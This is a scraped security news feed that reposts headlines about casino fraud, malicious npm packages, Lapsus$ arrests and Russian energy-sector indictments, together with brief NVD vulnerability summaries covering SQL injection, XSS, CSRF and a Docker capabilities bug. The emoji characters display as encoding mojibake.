π΄ How Casinos Can Prevent Loyalty Incentive and Account Takeover Fraud π΄
π Read
via "Dark Reading".
As casinos go digital, their loyalty programs and authentic accounts are at risk.π Read
via "Dark Reading".
Dark Reading
How Casinos Can Prevent Loyalty Incentive and Account Takeover Fraud
As casinos go digital, their loyalty programs and authentic accounts are at risk.
β Just-Released Dark Souls Game, Elden Ring, Includes Killer Bug β
π Read
via "Threat Post".
A patch fixes exploit hidden in Elden Ring that traps PC players in a βdeath loop.βπ Read
via "Threat Post".
Threat Post
Just-Released Dark Souls Game, Elden Ring, Includes Killer Bug
A patch fixes exploit hidden in Elden Ring that traps PC players in a βdeath loop.β
π Proposed Commission Would Seek to Modernize HIPAA π
π Read
via "".
As part of new legislation, a new commission would assess the current state of health data privacy and lay the groundwork for modernizing HIPAA.π Read
via "".
βΌ CVE-2021-43085 βΌ
π Read
via "National Vulnerability Database".
An Insecure Permissions vulnerability exists in the OpenSSL Project 3.0 due to an error in the implementation of the CMAC_Final() function.π Read
via "National Vulnerability Database".
βΌ CVE-2021-43666 βΌ
π Read
via "National Vulnerability Database".
A Denial of Service vulnerability exists in mbed TLS 3.0.0 and earlier in the mbedtls_pkcs12_derivation function when an input password's length is 0.π Read
via "National Vulnerability Database".
βΌ CVE-2022-22374 βΌ
π Read
via "National Vulnerability Database".
The BMC (IBM Power 9 AC922 OP910, OP920, OP930, and OP940) may be subject to downgrade attack which may affect its ability to operate its host. IBM X-Force ID: 221442.π Read
via "National Vulnerability Database".
βΌ CVE-2021-43084 βΌ
π Read
via "National Vulnerability Database".
An SQL Injection vulnerability exists in Dreamer CMS 4.0.0 via the tableName parameter.π Read
via "National Vulnerability Database".
β Microsoft Azure Developers Awash in PII-Stealing npm Packages β
π Read
via "Threat Post".
A large-scale, automated typosquatting attack saw 200+ malicious packages flood the npm code repository, targeting popular Azure scopes.π Read
via "Threat Post".
Threat Post
Microsoft Azure Developers Awash in PII-Stealing npm Packages
A large-scale, automated typosquatting attack saw 200+ malicious packages flood the npm code repository, targeting popular Azure scopes.
β UK Cops Collar 7 Suspected Lapsus$ Gang Members β
π Read
via "Threat Post".
London Police can't say if they nabbed the 17-year-old suspected mastermind & multimillionaire β but researchers say theyβve been tracking an Oxford teen since mid-2021.π Read
via "Threat Post".
Threat Post
UK Cops Collar 7 Suspected Lapsus$ Gang Members
London Police can't say if they nabbed the 17-year-old suspected mastermind & multimillionaire β but researchers say theyβve been tracking an Oxford teen since mid-2021.
π1
βΌ CVE-2022-24781 βΌ
π Read
via "National Vulnerability Database".
Geon is a board game based on solving questions about the Pythagorean Theorem. Malicious users can obtain the uuid from other users, spoof that uuid through the browser console and become co-owners of the target session. This issue is patched in version 1.1.0. No known workaround exists.π Read
via "National Vulnerability Database".
βΌ CVE-2022-24782 βΌ
π Read
via "National Vulnerability Database".
Discourse is an open source discussion platform. Versions 2.8.2 and prior in the `stable` branch, 2.9.0.beta3 and prior in the `beta` branch, and 2.9.0.beta3 and prior in the `tests-passed` branch are vulnerable to a data leak. Users can request an export of their own activity. Sometimes, due to category settings, they may have category membership for a secure category. The name of this secure category is shown to the user in the export. The same thing occurs when the user's post has been moved to a secure category. A patch for this issue is available in the `main` branch of Discourse's GitHub repository and is anticipated to be part of future releases.π Read
via "National Vulnerability Database".
βΌ CVE-2022-24769 βΌ
π Read
via "National Vulnerability Database".
Moby is an open-source project created by Docker to enable and accelerate software containerization. A bug was found in Moby (Docker Engine) prior to version 20.10.14 where containers were incorrectly started with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during `execve(2)`. Normally, when executable programs have specified permitted file capabilities, otherwise unprivileged users and processes can execute those programs and gain the specified file capabilities up to the bounding set. Due to this bug, containers which included executable programs with inheritable file capabilities allowed otherwise unprivileged users and processes to additionally gain these inheritable file capabilities up to the container's bounding set. Containers which use Linux users and groups to perform privilege separation inside the container are most directly impacted. This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in Moby (Docker Engine) 20.10.14. Running containers should be stopped, deleted, and recreated for the inheritable capabilities to be reset. This fix changes Moby (Docker Engine) behavior such that containers are started with a more typical Linux environment. As a workaround, the entry point of a container can be modified to use a utility like `capsh(1)` to drop inheritable capabilities prior to the primary process starting.π Read
via "National Vulnerability Database".
βΌ CVE-2022-24776 βΌ
π Read
via "National Vulnerability Database".
Flask-AppBuilder is an application development framework, built on top of the Flask web framework. Flask-AppBuilder contains an open redirect vulnerability when using database authentication login page on versions below 3.4.5. This issue is fixed in version 3.4.5. There are currently no known workarounds.π Read
via "National Vulnerability Database".
βΌ CVE-2022-25571 βΌ
π Read
via "National Vulnerability Database".
Bluedon Information Security Technologies Co.,Ltd Internet Access Detector v1.0 was discovered to contain an information leak which allows attackers to access the contents of the password file via unspecified vectors.π Read
via "National Vulnerability Database".
π΄ Russian Nationals Indicted for Epic Triton/Trisis and Dragonfly Cyberattacks on Energy Firms π΄
π Read
via "Dark Reading".
Four Russian government employees were charged by the DoJ for attack campaigns targeting hundreds of energy sector companies and organizations in 135 countries, including the US.π Read
via "Dark Reading".
Dark Reading
Russian Nationals Indicted for Epic Triton/Trisis and Dragonfly Cyberattacks on Energy Firms
Four Russian government employees were charged by the DoJ for attack campaigns targeting hundreds of energy sector companies and organizations in 135 countries, including the US.
βΌ CVE-2022-26279 βΌ
π Read
via "National Vulnerability Database".
EyouCMS v1.5.5 was discovered to have no access control in the component /data/sqldata.π Read
via "National Vulnerability Database".
βΌ CVE-2022-26249 βΌ
π Read
via "National Vulnerability Database".
Survey King v0.3.0 does not filter data properly when exporting excel files, allowing attackers to execute arbitrary code or access sensitive information via a CSV injection attack.π Read
via "National Vulnerability Database".
βΌ CVE-2022-26301 βΌ
π Read
via "National Vulnerability Database".
TuziCMS v2.0.6 was discovered to contain a SQL injection vulnerability via the component App\Manage\Controller\ZhuantiController.class.php.π Read
via "National Vulnerability Database".
βΌ CVE-2022-26272 βΌ
π Read
via "National Vulnerability Database".
A remote code execution (RCE) vulnerability in Ionize v1.0.8.1 allows attackers to execute arbitrary code via a crafted string written to the file application/config/config.php.π Read
via "National Vulnerability Database".
βΌ CVE-2022-25575 βΌ
π Read
via "National Vulnerability Database".
Multiple cross-site scripting (XSS) vulnerabilities in Parking Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via crafted payloads injected into the user name, password, and verification code text boxes.π Read
via "National Vulnerability Database".
βΌ CVE-2022-25576 βΌ
π Read
via "National Vulnerability Database".
Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component anchor/routes/posts.php. This vulnerability allows attackers to arbitrarily delete posts.π Read
via "National Vulnerability Database".